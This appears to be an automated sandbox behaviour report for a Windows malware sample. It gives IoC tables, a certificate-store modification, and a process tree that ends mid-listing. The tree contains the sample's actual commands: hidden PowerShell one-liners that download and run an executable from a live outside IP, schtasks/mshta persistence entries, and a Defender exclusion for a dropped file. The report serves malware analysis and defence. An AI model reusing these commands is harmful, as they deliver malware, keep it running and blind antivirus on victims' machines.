6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 0587d4f94b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 60e13ce159.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 60e13ce159.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2948 schtasks.exe 2344 schtasks.exe 2892 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 2932 rapes.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1356 TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE 2276 powershell.exe 2544 powershell.exe 1284 powershell.exe 3048 powershell.exe 3048 powershell.exe 3048 powershell.exe 2604 483d2fa8a0d53818306efeb32d3.exe 548 d7fb9061a7.exe 1996 ihu1EZOyUL.exe 2736 cc9ac2900b.exe 916 9bdac42c90.exe 1832 0587d4f94b.exe 1832 0587d4f94b.exe 1832 0587d4f94b.exe 1832 0587d4f94b.exe 1832 0587d4f94b.exe 2636 60e13ce159.exe 2888 ce4pMzk.exe 2888 ce4pMzk.exe 2888 ce4pMzk.exe 2888 ce4pMzk.exe 2636 60e13ce159.exe 2636 60e13ce159.exe 2636 60e13ce159.exe 2636 60e13ce159.exe 1564 c1c4c6ac25.exe 2160 7cb8f1b366.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 2784 powershell.exe 1520 a08064d4d7.exe 1520 a08064d4d7.exe 1520 a08064d4d7.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe 3720 fHR07lEtsm.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 1996 ihu1EZOyUL.exe Token: SeDebugPrivilege 1048 c8386e5aaa.exe Token: SeDebugPrivilege 2888 ce4pMzk.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeDebugPrivilege 580 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 1908 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 2272 firefox.exe Token: SeDebugPrivilege 2272 firefox.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 1520 a08064d4d7.exe Token: SeDebugPrivilege 3720 fHR07lEtsm.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 2576 2c6cf18ecd.exe 2576 2c6cf18ecd.exe 2576 2c6cf18ecd.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 2272 firefox.exe 2272 firefox.exe 2272 firefox.exe 2272 firefox.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2576 2c6cf18ecd.exe 2576 2c6cf18ecd.exe 2576 2c6cf18ecd.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 2272 firefox.exe 2272 firefox.exe 2272 firefox.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe 1832 b35c8a7182.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2964 wrote to memory of 2908 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 30 PID 2964 wrote to memory of 2908 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 30 PID 2964 wrote to memory of 2908 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 30 PID 2964 wrote to memory of 2908 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 30 PID 2964 wrote to memory of 2796 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 31 PID 2964 wrote to memory of 2796 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 31 PID 2964 wrote to memory of 2796 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 31 PID 2964 wrote to memory of 2796 2964 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 31 PID 2908 wrote to memory of 2948 2908 cmd.exe 33 PID 2908 wrote to memory of 2948 2908 cmd.exe 33 PID 2908 wrote to memory of 2948 2908 cmd.exe 33 PID 2908 wrote to memory of 2948 2908 cmd.exe 33 PID 2796 wrote to memory of 2900 2796 mshta.exe 34 PID 2796 wrote to memory of 2900 2796 mshta.exe 34 PID 2796 wrote to memory of 2900 2796 mshta.exe 34 PID 2796 wrote to memory of 2900 2796 mshta.exe 34 PID 2900 wrote to memory of 1084 2900 powershell.exe 36 PID 2900 wrote to memory of 1084 2900 powershell.exe 36 PID 2900 wrote to memory of 1084 2900 powershell.exe 36 PID 2900 wrote to memory of 1084 2900 powershell.exe 36 PID 1084 wrote to memory of 2932 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 37 PID 1084 wrote to memory of 2932 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 37 PID 1084 wrote to memory of 2932 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 37 PID 1084 wrote to memory of 2932 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 37 PID 2932 wrote to memory of 2576 2932 rapes.exe 39 PID 2932 wrote to memory of 2576 2932 rapes.exe 39 PID 2932 wrote to memory of 2576 2932 rapes.exe 39 PID 2932 wrote to memory of 2576 2932 rapes.exe 39 PID 2576 wrote to memory of 3032 2576 2c6cf18ecd.exe 40 PID 2576 wrote to memory of 3032 2576 2c6cf18ecd.exe 40 PID 2576 wrote to memory of 3032 2576 2c6cf18ecd.exe 40 PID 2576 wrote to memory of 3032 2576 2c6cf18ecd.exe 40 PID 2576 wrote to memory of 3028 2576 2c6cf18ecd.exe 41 PID 2576 wrote to memory of 3028 2576 2c6cf18ecd.exe 41 PID 2576 wrote to memory of 3028 2576 2c6cf18ecd.exe 41 PID 2576 wrote to memory of 3028 2576 2c6cf18ecd.exe 41 PID 3032 wrote to memory of 2344 3032 cmd.exe 43 PID 3032 wrote to memory of 2344 3032 cmd.exe 43 PID 3032 wrote to memory of 2344 3032 cmd.exe 43 PID 3032 wrote to memory of 2344 3032 cmd.exe 43 PID 3028 wrote to memory of 1952 3028 mshta.exe 44 PID 3028 wrote to memory of 1952 3028 mshta.exe 44 PID 3028 wrote to memory of 1952 3028 mshta.exe 44 PID 3028 wrote to memory of 1952 3028 mshta.exe 44 PID 2932 wrote to memory of 1668 2932 rapes.exe 46 PID 2932 wrote to memory of 1668 2932 rapes.exe 46 PID 2932 wrote to memory of 1668 2932 rapes.exe 46 PID 2932 wrote to memory of 1668 2932 rapes.exe 46 PID 1668 wrote to memory of 1808 1668 cmd.exe 48 PID 1668 wrote to memory of 1808 1668 cmd.exe 48 PID 1668 wrote to memory of 1808 1668 cmd.exe 48 PID 1668 wrote to memory of 1808 1668 cmd.exe 48 PID 1952 wrote to memory of 1356 1952 powershell.exe 49 PID 1952 wrote to memory of 1356 1952 powershell.exe 49 PID 1952 wrote to memory of 1356 1952 powershell.exe 49 PID 1952 wrote to memory of 1356 1952 powershell.exe 49 PID 1668 wrote to memory of 2432 1668 cmd.exe 50 PID 1668 wrote to memory of 2432 1668 cmd.exe 50 PID 1668 wrote to memory of 2432 1668 cmd.exe 50 PID 1668 wrote to memory of 2432 1668 cmd.exe 50 PID 2432 wrote to memory of 2276 2432 cmd.exe 51 PID 2432 wrote to memory of 2276 2432 cmd.exe 51 PID 2432 wrote to memory of 2276 2432 cmd.exe 51 PID 2432 wrote to memory of 2276 2432 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2948
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE"C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn M50Pbmap6ee /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn M50Pbmap6ee /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2344
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE"C:\Users\Admin\AppData\Local\TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "bWOarmajkm4" /tr "mshta \"C:\Temp\hubnHaAeM.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2892
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\hubnHaAeM.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2604
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe"C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:548 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 12327⤵
- Loads dropped DLL
- Program crash
PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1880 -
C:\Users\Admin\AppData\Roaming\SwffjsQHJy.exe"C:\Users\Admin\AppData\Roaming\SwffjsQHJy.exe"8⤵
- Executes dropped EXE
PID:1712
-
-
C:\Users\Admin\AppData\Roaming\ihu1EZOyUL.exe"C:\Users\Admin\AppData\Roaming\ihu1EZOyUL.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1996 -s 15929⤵PID:2880
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 5007⤵
- Loads dropped DLL
- Program crash
PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe"C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2736 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 10168⤵
- Loads dropped DLL
- Program crash
PID:1592
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104870101\9bdac42c90.exe"C:\Users\Admin\AppData\Local\Temp\10104870101\9bdac42c90.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:916 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104880101\0587d4f94b.exe"C:\Users\Admin\AppData\Local\Temp\10104880101\0587d4f94b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\10104890101\60e13ce159.exe"C:\Users\Admin\AppData\Local\Temp\10104890101\60e13ce159.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\yV9ypTrU\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Users\Admin\AppData\Roaming\mzwkecO.exe"C:\Users\Admin\AppData\Roaming\mzwkecO.exe"7⤵
- Executes dropped EXE
PID:3124
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104920101\c1c4c6ac25.exe"C:\Users\Admin\AppData\Local\Temp\10104920101\c1c4c6ac25.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:3060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104930101\7cb8f1b366.exe"C:\Users\Admin\AppData\Local\Temp\10104930101\7cb8f1b366.exe"6⤵
